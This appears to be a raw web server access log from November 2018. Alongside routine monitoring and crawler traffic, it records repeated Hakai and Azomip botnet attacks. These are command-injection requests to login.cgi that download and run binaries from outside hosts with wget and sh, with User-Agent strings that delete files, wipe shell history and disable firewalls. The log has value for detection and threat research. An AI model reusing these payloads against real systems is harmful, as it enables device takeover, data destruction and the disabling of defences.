212.91.246.72 - - [01/Nov/2018:07:22:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:23:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:24:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
191.255.177.64 - - [01/Nov/2018:07:25:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:07:25:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.129.11.41 - - [01/Nov/2018:07:25:59 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
79.129.11.41 - - [01/Nov/2018:07:26:03 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:07:26:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
202.125.52.156 - - [01/Nov/2018:07:26:57 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
122.133.149.90 - - [01/Nov/2018:07:27:12 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:07:27:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:28:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:29:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:30:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.122.56 - - [01/Nov/2018:07:30:50 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:07:31:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:32:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.26.48 - - [01/Nov/2018:07:33:09 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:07:33:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.77.192.35 - - [01/Nov/2018:07:34:10 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2018:07:34:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:35:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:36:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
61.27.169.4 - - [01/Nov/2018:07:37:19 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
122.22.223.254 - - [01/Nov/2018:07:37:41 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:07:37:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:38:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:39:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
206.189.63.85 - - [01/Nov/2018:07:39:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:07:40:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:41:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:42:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.114.174 - - [01/Nov/2018:07:42:47 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
41.44.247.230 - - [01/Nov/2018:07:43:15 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:07:43:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.114.174 - - [01/Nov/2018:07:44:15 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:07:44:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.33.224.56 - - [01/Nov/2018:07:45:28 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:07:45:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:46:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:47:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.108.166.51 - - [01/Nov/2018:07:48:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:07:48:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.220.200.138 - - [01/Nov/2018:07:49:37 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:07:49:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:50:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.32.184.210 - - [01/Nov/2018:07:51:07 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:07:51:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:52:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:53:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.220.200.138 - - [01/Nov/2018:07:54:33 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:07:54:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
210.139.209.43 - - [01/Nov/2018:07:55:02 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:07:55:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:07:56:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
40.77.167.82 - - [01/Nov/2018:07:56:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
94.125.47.163 - - [01/Nov/2018:07:57:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
156.209.195.174 - - [01/Nov/2018:07:57:20 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:07:57:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.122.56 - - [01/Nov/2018:07:57:47 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
206.189.111.103 - - [01/Nov/2018:07:58:10 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.24.5/hakai.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.24.5/hakai.mipsel -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.24.5/hakai.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:07:58:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.106.65.198 - - [01/Nov/2018:07:58:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:07:59:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:00:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:01:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.122.56 - - [01/Nov/2018:08:02:14 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:08:02:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.122.55 - - [01/Nov/2018:08:02:54 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:08:03:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.33.56.200 - - [01/Nov/2018:08:04:18 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.33.165/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:08:04:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:05:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:06:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.26.48 - - [01/Nov/2018:08:07:19 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
159.65.2.47 - - [01/Nov/2018:08:07:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:08:07:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.32.85.12 - - [01/Nov/2018:08:08:14 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
87.138.108.161 - - [01/Nov/2018:08:08:21 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.33.171/bin%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:08:08:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
206.189.98.120 - - [01/Nov/2018:08:09:04 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.24.5/hakai.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.24.5/hakai.mipsel -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.24.5/hakai.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:08:09:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.201.130.158 - - [01/Nov/2018:08:10:37 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:08:10:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.37.100.137 - - [01/Nov/2018:08:10:47 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:08:11:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:12:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.189.91.33 - - [01/Nov/2018:08:13:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:08:13:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:14:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:15:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:08:16:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.16.154.27 - - [01/Nov/2018:08:17:01 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
